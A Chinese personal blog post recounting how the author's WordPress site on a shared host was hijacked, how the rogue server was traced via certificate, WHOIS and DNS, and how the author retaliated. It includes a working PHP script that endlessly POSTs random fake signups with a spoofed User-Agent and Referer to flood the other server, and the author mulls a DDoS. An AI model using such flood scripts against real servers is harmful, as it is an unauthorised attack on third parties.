记一次站点被劫持
本文最后更新于 106 天前,其中的信息可能已经有所发展或是发生改变。

发现情况

昨天,我正看着 B 站,突然想起博客还没更(咕咕咕),于是我输入了博客WP后台的地址,然后。。。

大概就是下面这样的一个页面

Not Found

The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.

给我吓得以为是 WP 出 BUG 了,赶紧上主页看看

一看,呃。。。这根本不是我的站点,而是一个不知道是什么的所谓“定制版系统”的登录界面。

所谓定制版系统

但是我突然发现这个页面是 HTTP 协议,我签的证书掉了?不会吧,于是我把 HTTP 改成了 HTTPS,然后页面就因为主机名问题被 Chrome 拦截了,显示“此服务器无法证明它是 blog.xiaozhao233.top;其安全证书来自 v.****buy.cn。出现此问题的原因可能是配置有误或您的连接被拦截了。”我意识到我的站点被篡改了,立马访问了与我使用同一品牌虚拟主机的朋友 datao2233 的博客,发现也是如此,不过因为他挂了 CF 代理,HTTPS 始终有效,但站点内容仍是所谓“定制版系统”。

抽丝剥茧

从上面的 SSL 不被信任可以找到一个 ****buy.cn 的域名,.cn 好说,CNNIC 的国家域名 Whois 几乎能把域名所有者的信息透露一大半,能拿到姓名就值了,拿到邮箱就赚了,于是我打开 CNNIC 官网,输入了这个域名。

CNNIC 域名不存在

坏消息是 CNNIC 告诉我这个域名不存在,于是我又去查询了 ICANN Whois,企鹅云 Whois,套路云 Whois,终于在套路云发现了某些信息。

套路云 Whois

这个域名早在一年前就到期了,没有什么特别的收获,我便打算开始从这个域名曾经的解析记录入手,我打开微步云情报社区,竟然没搜到一点有用的东西。。。

然后就是尝试 nslookup 我被劫持的站点,发现了一个归属地为美国乔治亚亚特兰大的IP,通过某些技术手段换个 IP 一访问,还真是那个所谓“定制版系统”的老巢,于是。。。

发起攻击

于是我花了几分钟写了个 PHP 程序,大概就是下面那样。

<?php
while(true){
    $curlurl = "注册系统登录处理PHP地址";
    $referer = '前端注册界面';
    $postdata = array("account"=>rand()."@".rand().".com", "password"=>rand());
    $curl = curl_init();
        curl_setopt($curl,CURLOPT_URL, $curlurl);
        curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
        curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,10);
        curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.3538.77 Safari/537.36');
        curl_setopt($curl, CURLOPT_POST, true);
        curl_setopt($curl, CURLOPT_POSTFIELDS, $postdata);
    $back = curl_exec($curl);
}

大体思路就是随机生成一个邮箱比如说 1669****523121@16******5632.com(系统随机数生成,实际不存在)然后随机数生成一个密码比如说 18*****964555,然后伪造正常的浏览器 UA 字符串再伪造一个请求自注册界面的 Referer,就可以用 while(true) 死循环无限给他的注册处理程序 POST 随机生成的垃圾数据。

然后用 python 编写一个半秒请求一次上面程序的程序就可以开造了,毕竟谁会拒绝一个免费的靶场呢是不是。

于是我挂了一晚上程序,早上起来才发现我用来练习攻防的服务器 IP 在凌晨五六点被 BAN 了,要是没有备份数据可以直接回滚的话,三十几万条没啥用的垃圾数据,够他清几小时的了。

突然感觉自己好邪恶(

域名报毒

拿到 IP 后按老规矩肯定是同时丢 360 威胁情报中心和微步云情报社区同时检测的,微步云真的是一点有用的信息都没有,360 的查询结果一看到就让我想骂人。。。(电报:2053|2480|0132|1265

我的域名和 datao2233 的域名同时被标记为某些不太好说的东西

被劫持一道下来,站点就被强行抹上了“黑”、“灰”、“黄”,这谁受得了。。。

换个没被 BAN 的 IP 再 POST 他几小时吧。。。气死我了。。。(电报:··-· | ··- | -·-· | -·-)气死我了。。。要不还是直接 DDoS 算了。。。但是 OVH 很难得打死。。。气死我了。。。喵的。。。

问题解决

目前已经解决,问题原因尚不明确(因为你家主机商 CEO 不说,咱也不知道)

然后就没下文了(确信

总之站点已经恢复正常,目前正在准备发邮件给 360 申诉域名被标违法的事。

我真的栓 Q

送给 360

最后一句送话给那个黑产 IP 持有者:

氟铀碳钾 钇氧铀 钼钍铒 硼碘锝氢

FXXK YOU MOTHER BXXCH
暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
Bmoji
热词系列
TVmoji
小电视
2233娘
那兔
洛天依
红小豆
上一篇
下一篇